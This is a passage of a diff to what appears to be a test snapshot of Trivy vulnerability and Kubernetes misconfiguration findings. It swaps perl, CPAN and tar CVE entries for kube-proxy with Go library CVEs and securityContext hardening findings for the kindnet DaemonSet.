"https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", - }, - { - "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://groups.google.com/g/golang-announce", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - ], - }, - "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", + "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-28948", + "installedVersion": "v3.0.0-20210107192922-496545a6307b", + "packageName": "gopkg.in/yaml.v3", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://github.com/chansen/p5-http-tiny/pull/153", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "https://access.redhat.com/security/cve/CVE-2022-28948", + "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "https://github.com/go-yaml/yaml/issues/666", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "https://security.netapp.com/advisory/ntap-20220923-0006/", + "https://www.cve.org/CVERecord?id=CVE-2022-28948", ], }, "category": "Vulnerability", - "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", + "name": "crash when attempting to deserialize invalid input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://avd.aquasec.com/nvd/cve-2022-28948", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-28948", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://github.com/go-yaml/yaml/issues/666", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", }, { "type": "URL", - "value": "https://github.com/chansen/p5-http-tiny/pull/153", + "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", }, { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://avd.aquasec.com/misconfig/ksv003", + }, + { + "type": "URL", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -168579,47 +168328,86 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", ], }, - "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], "severity": "LOW", @@ -168627,749 +168415,1635 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9923", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", - "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", - "http://savannah.gnu.org/bugs/?55369", - "https://access.redhat.com/security/cve/CVE-2019-9923", - "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", - "https://ubuntu.com/security/notices/USN-4692-1", - "https://www.cve.org/CVERecord?id=CVE-2019-9923", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", ], }, - "category": "Vulnerability", - "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "tar: null-pointer dereference in pax_decode_header in sparse.c", + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9923", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "http://savannah.gnu.org/bugs/?55369", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9923", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4692-1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9923", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20193", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 